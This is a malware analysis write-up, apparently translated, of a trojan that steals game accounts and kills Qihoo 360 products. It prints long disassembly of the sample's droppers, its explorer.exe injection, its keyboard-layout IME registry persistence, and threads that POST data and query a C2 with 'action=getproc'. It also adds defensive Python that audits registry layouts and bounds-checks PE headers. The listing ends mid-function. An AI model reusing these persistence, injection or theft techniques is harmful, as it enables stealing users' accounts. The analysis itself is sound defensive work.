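Keying the state on the process handle rather than just the pid is what keeps the false-positive rate down: an allocation in one target and a remote thread in another never combine. In production this correlation would run over ETW or kernel-callback events rather than a text trace, and the start-address check should also cover LoadLibraryW and the Ex variants.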


Code:
004021DA B9 81000000 mov ecx, 81
004021DF 33C0 xor eax, eax
004021E1 8DBD A9F5FFFF lea edi, dword ptr [ebp-A57]
004021E7 889D A8F5FFFF mov byte ptr [ebp-A58], bl
004021ED F3:AB rep stos dword ptr es:[edi]
004021EF 66:AB stos word ptr es:[edi]
004021F1 AA stos byte ptr es:[edi]
004021F2 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
004021F8 50 push eax
004021F9 E8 ABF7FFFF call 004019A9 ; looks for the file dbr31004.ocx; it is found, so no jump
004021FE 8B35 BC104000 mov esi, dword ptr [4010BC] ; USER32.wsprintfA
00402204 83C4 0C add esp, 0C
00402207 85C0 test eax, eax
00402209 74 32 je short 0040223D
0040220B 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00402211 50 push eax
00402212 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00402218 50 push eax
00402219 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040221F 50 push eax
00402220 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402226 68 8C154000 push 0040158C ; ASCII "%s %s pfjaoidjglkajd %s"
0040222B 50 push eax
0040222C FFD6 call esi
0040222E 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402234 50 push eax
00402235 E8 87FBFFFF call 00401DC1 ; creates the gbvgbv31.exe process
0040223A 83C4 18 add esp, 18
0040223D 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402243 50 push eax
00402244 E8 60F7FFFF call 004019A9
00402249 85C0 test eax, eax
0040224B 59 pop ecx
0040224C 74 2B je short 00402279
0040224E 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402254 50 push eax
00402255 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040225B 50 push eax
0040225C 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402262 68 74154000 push 00401574 ; ASCII "%s %s pfjieaoidjglkajd"
00402267 50 push eax
00402268 FFD6 call esi
0040226A 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402270 50 push eax
00402271 E8 4BFBFFFF call 00401DC1
00402276 83C4 14 add esp, 14
00402279 53 push ebx
0040227A FF15 68104000 call dword ptr [401068] ; kernel32.ExitProcess, exits the process
00402280 6A 01 push 1
00402282 58 pop eax
00402283 5F pop edi
00402284 5E pop esi
00402285 5B pop ebx
00402286 C9 leave
00402287 C2 1000 retn 10
As described above, gbvgbv31.exe runs the two files dbr31004.ocx and dbr99008.ocx:

C:\WINDOWS\system32\dbr31004.ocx 0x10000000 0x0000E000
C:\WINDOWS\system32\DBR99008.OCX 0x00C30000 0x00006000

Files injected into explorer.exe: C:\WINDOWS\system32\dbr99008.ocx, base 0x03800000, size 0x00006000
C:\WINDOWS\system32\dbr31004.ocx, base 0x03EB0000, size 0x0000E000


Now let's analyze dbr99008.ocx. Its main job is to modify the input-method (keyboard layout) entries in the registry, associating dbr99008.ocx with kbdus.dll, as follows:


HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
2 = "E0200804"
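The registry change above is the persistence mechanism: a bogus keyboard layout whose "Ime File" points to the dropped OCX, preloaded for the user at logon. The Python below is an added example, not from the original post, that audits a registry listing in the same dumped format: it flags any layout whose "Ime File" is not an .ime and reports which Preload slots activate it. The listing is a constructed copy of the entries above plus one benign US layout (00000409) added as a control.

```python
import re

# Constructed copy of the registry listing from the write-up, in the same dumped
# format, plus a benign 00000409 layout as a control entry.
REG_DUMP = r"""[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409]
Layout Text = "US"
Layout File = "KBDUS.DLL"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
1 = "00000409"
2 = "E0200804"
"""

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^(.+?)\s*=\s*"(.*)"$')


def parse_reg_dump(text):
    """Parse '[key]' headers followed by 'name = "value"' lines into {key: {name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def audit_keyboard_layouts(text):
    """Return (suspicious, preloaded): suspicious maps layout id -> 'Ime File' for
    layouts whose IME module is not a .ime; preloaded maps Preload slot -> layout id
    for slots that would load one of those layouts at logon."""
    keys = parse_reg_dump(text)
    suspicious = {}
    for path, values in keys.items():
        head, _, layout_id = path.rpartition("\\")
        if not head.lower().endswith("\\keyboard layouts"):
            continue
        ime = values.get("Ime File")
        if ime and not ime.lower().endswith(".ime"):
            suspicious[layout_id.upper()] = ime
    preloaded = {}
    for path, values in keys.items():
        if path.lower().endswith("\\keyboard layout\\preload"):
            for slot, layout_id in values.items():
                if layout_id.upper() in suspicious:
                    preloaded[slot] = layout_id.upper()
    return suspicious, preloaded


if __name__ == "__main__":
    bad, slots = audit_keyboard_layouts(REG_DUMP)
    for layout_id, ime in bad.items():
        print(f"layout {layout_id}: Ime File -> {ime}")
    for slot, layout_id in slots.items():
        print(f"Preload slot {slot} activates {layout_id}")
```

The extension check is deliberately simple; a fuller audit would also verify that the referenced IME module lives under the Windows directory and carries a valid signature, since a renamed .ime in system32 would pass this test.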

The main malicious work is done in dbr31004.ocx, so the dbr99008.ocx code is not pasted here.

It also generates the file win28007d9039.dll in the temp directory; this is actually kernel32.dll.

To make analysis easier I simply created a few windows disguised as ldjgame.exe and launch.exe.
First of all, this is an account-stealing trojan. The games targeted are 鹿鼎記, SMDL (神魔大陸) and QQ Games. The notes I made earlier are all gone, so now I'll just briefly analyze a few threads.
It also kills the 360 series (Qihoo 360 security products).
dbr31004.ocx mainly creates 7 threads:


Now the analysis of dbr31004.ocx:

Code:
1000A564 > 55 push ebp
1000A565 8BEC mov ebp, esp
1000A567 81EC 18010000 sub esp, 118
1000A56D 837D 0C 01 cmp dword ptr [ebp+C], 1
1000A571 74 09 je short 1000A57C
1000A573 817D 0C 6666888>cmp dword ptr [ebp+C], 88886666
1000A57A 75 60 jnz short 1000A5DC
1000A57C 8D45 EC lea eax, dword ptr [ebp-14]
1000A57F 6A 01 push 1
1000A581 50 push eax
1000A582 FF15 20300010 call dword ptr [<&ADVAPI32.Initialize>; ADVAPI32.InitializeSecurityDescriptor
1000A588 6A 00 push 0
1000A58A 6A 00 push 0
1000A58C 8D45 EC lea eax, dword ptr [ebp-14]
1000A58F 6A 01 push 1
1000A591 50 push eax
1000A592 FF15 00300010 call dword ptr [<&ADVAPI32.SetSecurit>; ADVAPI32.SetSecurityDescriptorDacl
1000A598 FF15 2C310010 call dword ptr [<&KERNEL32.GetCurrent>; kernel32.GetCurrentProcessId
1000A59E 50 push eax ; gets the PID of loaddll.exe
1000A59F 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
1000A5A5 68 EC3E0010 push 10003EEC ; ASCII "gbvLUDJ31004_rel_regamle_%08d_"
1000A5AA 50 push eax
1000A5AB FF15 F0310010 call dword ptr [<&USER32.wsprintfA>] ; USER32.wsprintfA
1000A5B1 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
1000A5B7 50 push eax
1000A5B8 E8 49A4FFFF call 10004A06 ; creates a mutex
1000A5BD 83C4 10 add esp, 10
1000A5C0 85C0 test eax, eax
1000A5C2 74 04 je short 1000A5C8
1000A5C4 33C0 xor eax, eax
1000A5C6 EB 17 jmp short 1000A5DF
1000A5C8 FF75 10 push dword ptr [ebp+10]
1000A5CB FF75 0C push dword ptr [ebp+C]
1000A5CE FF75 08 push dword ptr [ebp+8]
1000A5D1 E8 B6FEFFFF call 1000A48C ; this call is key: inside it does various PE operations and obtains the function addresses of kernel32.dll etc.
1000A5D6 83C4 0C add esp, 0C
1000A5D9 8945 0C mov dword ptr [ebp+C], eax
1000A5DC 8B45 0C mov eax, dword ptr [ebp+C]
1000A5DF C9 leave
1000A5E0 C2 0C00 retn 0C



Now we enter call 1000A48C:


1000A48C 55 push ebp
1000A48D 8BEC mov ebp, esp
1000A48F 83EC 10 sub esp, 10
1000A492 53 push ebx
1000A493 8B1D 4C300010 mov ebx, dword ptr [<&KERNEL32.GetMo>; kernel32.GetModuleFileNameA
1000A499 56 push esi
1000A49A 57 push edi
1000A49B BF D82C0010 mov edi, 10002CD8
1000A4A0 68 04010000 push 104
1000A4A5 57 push edi
1000A4A6 6A 00 push 0
1000A4A8 FFD3 call ebx
1000A4AA BE 66668888 mov esi, 88886666
1000A4AF 3975 0C cmp dword ptr [ebp+C], esi
1000A4B2 75 11 jnz short 1000A4C5
1000A4B4 FF75 10 push dword ptr [ebp+10]
1000A4B7 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A4BC E8 11090000 call <jmp.&MSVCRT.strcpy>
1000A4C1 59 pop ecx
1000A4C2 59 pop ecx
1000A4C3 EB 0F jmp short 1000A4D4
1000A4C5 68 04010000 push 104
1000A4CA 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A4CF FF75 08 push dword ptr [ebp+8]
1000A4D2 FFD3 call ebx ; get the full file name, GetModuleFileNameA
1000A4D4 8065 FC 00 and byte ptr [ebp-4], 0
1000A4D8 3975 0C cmp dword ptr [ebp+C], esi
1000A4DB C645 F0 65 mov byte ptr [ebp-10], 65 ; explorer.exe
1000A4DF C645 F1 78 mov byte ptr [ebp-F], 78
1000A4E3 C645 F2 70 mov byte ptr [ebp-E], 70
1000A4E7 C645 F3 6C mov byte ptr [ebp-D], 6C
1000A4EB C645 F4 6F mov byte ptr [ebp-C], 6F
1000A4EF C645 F5 72 mov byte ptr [ebp-B], 72
1000A4F3 C645 F6 65 mov byte ptr [ebp-A], 65
1000A4F7 C645 F7 72 mov byte ptr [ebp-9], 72
1000A4FB C645 F8 2E mov byte ptr [ebp-8], 2E
1000A4FF C645 F9 65 mov byte ptr [ebp-7], 65
1000A503 C645 FA 78 mov byte ptr [ebp-6], 78
1000A507 C645 FB 65 mov byte ptr [ebp-5], 65
1000A50B 74 43 je short 1000A550
1000A50D 57 push edi ; uppercase to lowercase
1000A50E FF15 70310010 call dword ptr [<&MSVCRT._strlwr>] ; msvcrt._strlwr
1000A514 8B35 B4310010 mov esi, dword ptr [<&MSVCRT.strstr>>; msvcrt.strstr
1000A51A C70424 E43E0010 mov dword ptr [esp], 10003EE4 ; ASCII "gbvgbv" this string looks familiar: in the parent, rundll32.exe was copied to gbvgbv31.exe
1000A521 57 push edi
1000A522 FFD6 call esi
1000A524 59 pop ecx
1000A525 85C0 test eax, eax
1000A527 59 pop ecx
1000A528 75 16 jnz short 1000A540
1000A52A 8D45 F0 lea eax, dword ptr [ebp-10]
1000A52D 50 push eax
1000A52E 57 push edi
1000A52F FFD6 call esi
1000A531 59 pop ecx
1000A532 85C0 test eax, eax
1000A534 59 pop ecx
1000A535 75 09 jnz short 1000A540
1000A537 E8 09FFFFFF call 1000A445 ; this call works on the PE file and obtains function addresses etc.

{


1000A445 55 push ebp
1000A446 8BEC mov ebp, esp
1000A448 83EC 0C sub esp, 0C
1000A44B 8365 F4 00 and dword ptr [ebp-C], 0
1000A44F 8365 F8 00 and dword ptr [ebp-8], 0
1000A453 8D45 F4 lea eax, dword ptr [ebp-C]
1000A456 C745 FC 0100000>mov dword ptr [ebp-4], 1
1000A45D 50 push eax
1000A45E E8 25FFFFFF call 1000A388 ;
{


1000A388 55 push ebp
1000A389 8BEC mov ebp, esp
1000A38B 51 push ecx
1000A38C 51 push ecx
1000A38D 53 push ebx
1000A38E 33DB xor ebx, ebx
1000A390 53 push ebx
1000A391 53 push ebx
1000A392 6A 03 push 3
1000A394 53 push ebx
1000A395 6A 01 push 1
1000A397 68 00000080 push 80000000
1000A39C 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A3A1 FF15 A4300010 call dword ptr [<&KERNEL32.CreateFile>; kernel32.CreateFileA
1000A3A7 83F8 FF cmp eax, -1
1000A3AA 8945 FC mov dword ptr [ebp-4], eax
1000A3AD 74 58 je short 1000A407
1000A3AF 56 push esi
1000A3B0 57 push edi
1000A3B1 53 push ebx
1000A3B2 50 push eax
1000A3B3 FF15 0C310010 call dword ptr [<&KERNEL32.GetFileSiz>; kernel32.GetFileSize
1000A3B9 8BF0 mov esi, eax
1000A3BB 6A 04 push 4
1000A3BD 68 00100000 push 1000
1000A3C2 56 push esi
1000A3C3 53 push ebx
1000A3C4 FF15 D0300010 call dword ptr [<&KERNEL32.VirtualAll>; kernel32.VirtualAlloc
1000A3CA 8BF8 mov edi, eax
1000A3CC 3BFB cmp edi, ebx
1000A3CE 74 2C je short 1000A3FC
1000A3D0 8D45 F8 lea eax, dword ptr [ebp-8]
1000A3D3 53 push ebx
1000A3D4 50 push eax
1000A3D5 56 push esi
1000A3D6 57 push edi
1000A3D7 FF75 FC push dword ptr [ebp-4]
1000A3DA FF15 BC300010 call dword ptr [<&KERNEL32.ReadFile>] ; kernel32.ReadFile
1000A3E0 56 push esi
1000A3E1 57 push edi
1000A3E2 FF75 08 push dword ptr [ebp+8]
1000A3E5 E8 51FFFFFF call 1000A33B ; performs PE operations, gets function addresses etc.

{
Checks whether this is a PE file, i.e. checks for MZ and PE (5A4D and 4550):
1000A136 8B4424 04 mov eax, dword ptr [esp+4]
1000A13A 66:8138 4D5A cmp word ptr [eax], 5A4D
1000A13F 75 10 jnz short 1000A151
1000A141 8B48 3C mov ecx, dword ptr [eax+3C] ; IMAGE_DOS_HEADER, e_lfanew at offset 3C
1000A144 813C01 50450000 cmp dword ptr [ecx+eax], 4550
1000A14B 75 04 jnz short 1000A151
1000A14D 6A 01 push 1
1000A14F 58 pop eax
1000A150 C3 retn

}
1000A3EA 83C4 0C add esp, 0C
1000A3ED 8BD8 mov ebx, eax
1000A3EF 68 00400000 push 4000
1000A3F4 56 push esi
1000A3F5 57 push edi
1000A3F6 FF15 04310010 call dword ptr [<&KERNEL32.VirtualFre>; kernel32.VirtualFree
1000A3FC FF75 FC push dword ptr [ebp-4]
1000A3FF FF15 30310010 call dword ptr [<&KERNEL32.CloseHandl>; kernel32.CloseHandle
1000A405 5F pop edi
1000A406 5E pop esi
1000A407 8BC3 mov eax, ebx
1000A409 5B pop ebx
1000A40A C9 leave
1000A40B C3 retn

}
1000A463 C70424 D42B0010 mov dword ptr [esp], 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A46A 8D45 F4 lea eax, dword ptr [ebp-C]
1000A46D 68 66668888 push 88886666
1000A472 50 push eax
1000A473 E8 94FFFFFF call 1000A40C
1000A478 68 00100000 push 1000
1000A47D 6A 00 push 0
1000A47F FF75 F4 push dword ptr [ebp-C]
1000A482 E8 23090000 call <jmp.&MSVCRT.memset>
1000A487 83C4 18 add esp, 18
1000A48A C9 leave
1000A48B C3 retn

}
1000A53C 33C0 xor eax, eax
1000A53E EB 1F jmp short 1000A55F
1000A540 FF75 10 push dword ptr [ebp+10]
1000A543 FF75 0C push dword ptr [ebp+C]
1000A546 FF75 08 push dword ptr [ebp+8]
1000A549 E8 94030000 call 1000A8E2
1000A54E EB 0F jmp short 1000A55F
1000A550 6A 00 push 0
1000A552 6A 01 push 1
1000A554 FF75 08 push dword ptr [ebp+8]
1000A557 E8 86030000 call 1000A8E2
1000A55C 6A 01 push 1
1000A55E 58 pop eax
1000A55F 5F pop edi
1000A560 5E pop esi
1000A561 5B pop ebx
1000A562 C9 leave
1000A563 C3 retn
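The MZ/PE check at 1000A136 inside the listing above trusts e_lfanew blindly and would read past the end of a short or malformed buffer. As an added example (not the author's code), here is a bounds-checked Python version of that check plus a reader for the IMAGE_FILE_HEADER that follows the PE signature, with a constructed minimal header used as test input; the header values (machine 0x14C, three sections, the timestamp) are arbitrary.

```python
import struct

MZ_MAGIC = b"MZ"
PE_MAGIC = b"PE\x00\x00"
E_LFANEW_OFFSET = 0x3C
FILE_HEADER_SIZE = 20          # sizeof(IMAGE_FILE_HEADER)


def is_pe_image(buf):
    """Bounds-checked version of the check at 1000A136: reject buffers too short
    to hold e_lfanew, and e_lfanew values that point outside the buffer, instead
    of dereferencing them the way the sample does."""
    if len(buf) < E_LFANEW_OFFSET + 4 or buf[:2] != MZ_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", buf, E_LFANEW_OFFSET)[0]
    if e_lfanew + 4 > len(buf):
        return False
    return buf[e_lfanew:e_lfanew + 4] == PE_MAGIC


def pe_header_info(buf):
    """Return (Machine, NumberOfSections, TimeDateStamp) from IMAGE_FILE_HEADER,
    or None if the buffer is not a PE image or is truncated before the header."""
    if not is_pe_image(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, E_LFANEW_OFFSET)[0]
    fh = e_lfanew + 4
    if fh + FILE_HEADER_SIZE > len(buf):
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", buf, fh)
    return machine, nsections, timestamp


def build_stub(e_lfanew=0x80, machine=0x14C, nsections=3, timestamp=0x4E3FF000):
    """Constructed minimal image: MZ header with e_lfanew, then PE\\0\\0 and a
    file header (Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    NumberOfSymbols, SizeOfOptionalHeader, Characteristics). Not a loadable file."""
    buf = bytearray(e_lfanew + 4 + FILE_HEADER_SIZE)
    buf[:2] = MZ_MAGIC
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = PE_MAGIC
    struct.pack_into("<HHIIIHH", buf, e_lfanew + 4,
                     machine, nsections, timestamp, 0, 0, 0xE0, 0x2102)
    return bytes(buf)


if __name__ == "__main__":
    print(pe_header_info(build_stub()))
```

The two extra length checks are the whole point: when a loader-style routine like the one in dbr31004.ocx is fed a file that was truncated or tampered with, the unchecked `cmp dword ptr [ecx+eax], 4550` becomes an out-of-bounds read, which is exactly the kind of defect that turns a parser into a crash or an exploitation primitive.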

Thread 3, which does the network operations, performs a POST:

ASCII "WININET.dll"
kernel32.LoadLibraryA
ASCII "InternetOpenA"
766957c6
ASCII "InternetOpenUrlA"
76695a92

ASCII "HttpQueryInfoA"
76697932
ASCII "InternetReadFile"
7669825f

ASCII "InternetCloseHandle"
76694dc4


10007ED5 55 push ebp
10007ED6 8BEC mov ebp, esp
10007ED8 81EC F8030000 sub esp, 3F8
10007EDE 53 push ebx
10007EDF 57 push edi
10007EE0 6A 7F push 7F
10007EE2 33DB xor ebx, ebx
10007EE4 59 pop ecx
10007EE5 33C0 xor eax, eax
10007EE7 8DBD FDFDFFFF lea edi, dword ptr [ebp-203]
10007EED 889D FCFDFFFF mov byte ptr [ebp-204], bl
10007EF3 F3:AB rep stos dword ptr es:[edi]
10007EF5 FF75 0C push dword ptr [ebp+C]
10007EF8 66:AB stos word ptr es:[edi]
10007EFA AA stos byte ptr es:[edi]
10007EFB 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F01 50 push eax
10007F02 E8 CB2E0000 call <jmp.&MSVCRT.strcpy>
10007F07 59 pop ecx
10007F08 59 pop ecx
10007F09 E8 B5C6FFFF call 100045C3 ; gets the addresses of the network functions
10007F0E E8 A7FDFFFF call 10007CBA ; same as above, continues resolving
10007F13 53 push ebx
10007F14 53 push ebx
10007F15 53 push ebx
10007F16 53 push ebx
10007F17 68 1C3D0010 push 10003D1C ; ASCII "HttpSendRequestEx"
10007F1C FF15 C0110010 call dword ptr [100011C0]
10007F22 3BC3 cmp eax, ebx
10007F24 8945 FC mov dword ptr [ebp-4], eax
10007F27 75 07 jnz short 10007F30
10007F29 53 push ebx
10007F2A FF15 6C310010 call dword ptr [<&MSVCRT.exit>] ; msvcrt.exit
10007F30 56 push esi
10007F31 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F37 6A 3A push 3A
10007F39 50 push eax
10007F3A FF15 48310010 call dword ptr [<&MSVCRT.strchr>] ; msvcrt.strchr
10007F40 8BF0 mov esi, eax
10007F42 59 pop ecx
10007F43 3BF3 cmp esi, ebx
10007F45 59 pop ecx
10007F46 74 0F je short 10007F57
10007F48 8D46 01 lea eax, dword ptr [esi+1]
10007F4B 50 push eax
10007F4C FF15 78310010 call dword ptr [<&MSVCRT.atoi>] ; msvcrt.atoi
10007F52 59 pop ecx
10007F53 881E mov byte ptr [esi], bl
10007F55 EB 03 jmp short 10007F5A
10007F57 6A 50 push 50
10007F59 58 pop eax
10007F5A 53 push ebx
10007F5B 53 push ebx
10007F5C 6A 03 push 3
10007F5E 53 push ebx
10007F5F 53 push ebx
10007F60 50 push eax
10007F61 8D85 FCFDFFFF lea eax, dword ptr [ebp-204]
10007F67 50 push eax
10007F68 FF75 FC push dword ptr [ebp-4]
10007F6B FF15 C0200010 call dword ptr [100020C0]
10007F71 8BF8 mov edi, eax
10007F73 3BFB cmp edi, ebx
10007F75 74 67 je short 10007FDE
10007F77 53 push ebx
10007F78 68 00000004 push 4000000
10007F7D 53 push ebx
10007F7E 53 push ebx
10007F7F 53 push ebx
10007F80 FF75 10 push dword ptr [ebp+10]
10007F83 68 143D0010 push 10003D14 ; ASCII "POST"
10007F88 57 push edi
10007F89 FF15 C4200010 call dword ptr [100020C4]
10007F8F 8BF0 mov esi, eax
10007F91 3BF3 cmp esi, ebx
10007F93 74 42 je short 10007FD7
10007F95 FF75 08 push dword ptr [ebp+8]
10007F98 56 push esi
10007F99 E8 6BFBFFFF call 10007B09
10007F9E 59 pop ecx
10007F9F 85C0 test eax, eax
10007FA1 59 pop ecx
10007FA2 74 2C je short 10007FD0
10007FA4 8D45 0C lea eax, dword ptr [ebp+C]
10007FA7 895D 0C mov dword ptr [ebp+C], ebx
10007FAA 50 push eax
10007FAB 8D85 08FCFFFF lea eax, dword ptr [ebp-3F8]
10007FB1 68 F3010000 push 1F3
10007FB6 50 push eax
10007FB7 56 push esi
10007FB8 FF15 B4110010 call dword ptr [100011B4]
10007FBE 85C0 test eax, eax
10007FC0 8B45 0C mov eax, dword ptr [ebp+C]
10007FC3 74 07 je short 10007FCC
10007FC5 889C05 08FCFFFF mov byte ptr [ebp+eax-3F8], bl
10007FCC 3BC3 cmp eax, ebx
10007FCE ^ 77 D4 ja short 10007FA4
10007FD0 56 push esi
10007FD1 FF15 B8110010 call dword ptr [100011B8]
10007FD7 57 push edi
10007FD8 FF15 B8110010 call dword ptr [100011B8]
10007FDE FF75 FC push dword ptr [ebp-4]
10007FE1 FF15 B8110010 call dword ptr [100011B8]
10007FE7 5E pop esi
10007FE8 5F pop edi
10007FE9 5B pop ebx
10007FEA C9 leave
10007FEB C3 retn


Thread 4 likewise transfers network data:
10008C1E 55 push ebp ; thread 4
10008C1F 8BEC mov ebp, esp
10008C21 81EC 28040000 sub esp, 428
10008C27 53 push ebx
10008C28 56 push esi
10008C29 8B35 B0300010 mov esi, dword ptr [<&KERNEL32.Sleep>] ; kernel32.Sleep
10008C2F 57 push edi
10008C30 33DB xor ebx, ebx
10008C32 68 B80B0000 push 0BB8
10008C37 895D FC mov dword ptr [ebp-4], ebx
10008C3A FFD6 call esi
10008C3C 391D FC210010 cmp dword ptr [100021FC], ebx
10008C42 75 05 jnz short 10008C49
10008C44 E8 77F4FFFF call 100080C0 ; loads ws2_32.dll and obtains the addresses of recv and recvfrom
10008C49 E8 B3F5FFFF call 10008201
10008C4E 85C0 test eax, eax
10008C50 74 03 je short 10008C55
10008C52 895D FC mov dword ptr [ebp-4], ebx
10008C55 6A 7F push 7F
10008C57 33C0 xor eax, eax
10008C59 59 pop ecx
10008C5A 8DBD D9FDFFFF lea edi, dword ptr [ebp-227]
10008C60 889D D8FDFFFF mov byte ptr [ebp-228], bl
10008C66 F3:AB rep stos dword ptr es:[edi]
10008C68 66:AB stos word ptr es:[edi]
10008C6A AA stos byte ptr es:[edi]
10008C6B 68 D0070000 push 7D0
10008C70 FFD6 call esi
10008C72 395D FC cmp dword ptr [ebp-4], ebx
10008C75 75 08 jnz short 10008C7F
10008C77 E8 85F5FFFF call 10008201
10008C7C 8945 FC mov dword ptr [ebp-4], eax
10008C7F 68 00020000 push 200
10008C84 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008C8A 53 push ebx
10008C8B 50 push eax
10008C8C E8 19210000 call <jmp.&MSVCRT.memset>
10008C91 68 BC1C0010 push 10001CBC
10008C96 8D45 E4 lea eax, dword ptr [ebp-1C]
10008C99 68 F4200010 push 100020F4
10008C9E 50 push eax
10008C9F 8D85 D8FBFFFF lea eax, dword ptr [ebp-428]
10008CA5 C645 E4 25 mov byte ptr [ebp-1C], 25
10008CA9 50 push eax
10008CAA C645 E5 73 mov byte ptr [ebp-1B], 73
10008CAE C645 E6 3F mov byte ptr [ebp-1A], 3F
10008CB2 C645 E7 61 mov byte ptr [ebp-19], 61
10008CB6 C645 E8 63 mov byte ptr [ebp-18], 63
10008CBA C645 E9 74 mov byte ptr [ebp-17], 74
10008CBE C645 EA 69 mov byte ptr [ebp-16], 69
10008CC2 C645 EB 6F mov byte ptr [ebp-15], 6F
10008CC6 C645 EC 6E mov byte ptr [ebp-14], 6E
10008CCA C645 ED 3D mov byte ptr [ebp-13], 3D
10008CCE C645 EE 67 mov byte ptr [ebp-12], 67
10008CD2 C645 EF 65 mov byte ptr [ebp-11], 65
10008CD6 C645 F0 74 mov byte ptr [ebp-10], 74
10008CDA C645 F1 70 mov byte ptr [ebp-F], 70
10008CDE C645 F2 72 mov byte ptr [ebp-E], 72
10008CE2 C645 F3 6F mov byte ptr [ebp-D], 6F
10008CE6 C645 F4 63 mov byte ptr [ebp-C], 63
10008CEA C645 F5 26 mov byte ptr [ebp-B], 26
10008CEE C645 F6 75 mov byte ptr [ebp-A], 75
10008CF2 C645 F7 3D mov byte ptr [ebp-9], 3D
10008CF6 C645 F8 25 mov byte ptr [ebp-8], 25
10008CFA C645 F9 73 mov byte ptr [ebp-7], 73
10008CFE 885D FA mov byte ptr [ebp-6], bl
10008D01 FF15 F0310010 call dword ptr [<&USER32.wsprintfA>] ; USER32.wsprintfA
10008D07 83C4 1C add esp, 1C ; ? action=getproc&u=
10008D0A 381D F8210010 cmp byte ptr [100021F8], bl
10008D10 ^ 0F85 55FFFFFF jnz 10008C6B
10008D16 8D45 E0 lea eax, dword ptr [ebp-20]
10008D19 50 push eax
10008D1A 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D20 50 push eax
10008D21 8D85 D8FBFFFF lea eax, dword ptr [ebp-428]
10008D27 50 push eax
10008D28 E8 FCECFFFF call 10007A29
10008D2D 83C4 0C add esp, 0C
10008D30 85C0 test eax, eax
10008D32 74 5A je short 10008D8E
10008D34 8B45 E0 mov eax, dword ptr [ebp-20]
10008D37 889C05 D8FDFFFF mov byte ptr [ebp+eax-228], bl
10008D3E 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D44 50 push eax
10008D45 E8 FAF9FFFF call 10008744
10008D4A 8D85 D8FDFFFF lea eax, dword ptr [ebp-228]
10008D50 50 push eax
10008D51 E8 C3F9FFFF call 10008719
10008D56 59 pop ecx
10008D57 83F8 01 cmp eax, 1
10008D5A 59 pop ecx
10008D5B 74 3E je short 10008D9B
10008D5D 381D D4200010 cmp byte ptr [100020D4], bl
10008D63 74 29 je short 10008D8E
10008D65 833D F0200010 0>cmp dword ptr [100020F0], 1
10008D6C 7E 12 jle short 10008D80
10008D6E 891D F0200010 mov dword ptr [100020F0], ebx
10008D74 881D D4200010 mov byte ptr [100020D4], bl
10008D7A 891D 14220010 mov dword ptr [10002214], ebx
10008D80 381D D4200010 cmp byte ptr [100020D4], bl
10008D86 74 06 je short 10008D8E
10008D88 FF05 F0200010 inc dword ptr [100020F0]
10008D8E 391D 1C220010 cmp dword ptr [1000221C], ebx
10008D94 75 68 jnz short 10008DFE
10008D96 ^ E9 D0FEFFFF jmp 10008C6B
10008D9B A1 FC210010 mov eax, dword ptr [100021FC]
10008DA0 3BC3 cmp eax, ebx
10008DA2 74 31 je short 10008DD5
10008DA4 895D DC mov dword ptr [ebp-24], ebx
10008DA7 7E 36 jle short 10008DDF
10008DA9 C745 FC 0422001>mov dword ptr [ebp-4], 10002204
10008DB0 8B45 FC mov eax, dword ptr [ebp-4]
10008DB3 8B00 mov eax, dword ptr [eax]
10008DB5 8945 D8 mov dword ptr [ebp-28], eax
10008DB8 60 pushad
10008DB9 8B45 D8 mov eax, dword ptr [ebp-28]
10008DBC FFD0 call eax
10008DBE 61 popad
10008DBF FF45 DC inc dword ptr [ebp-24]
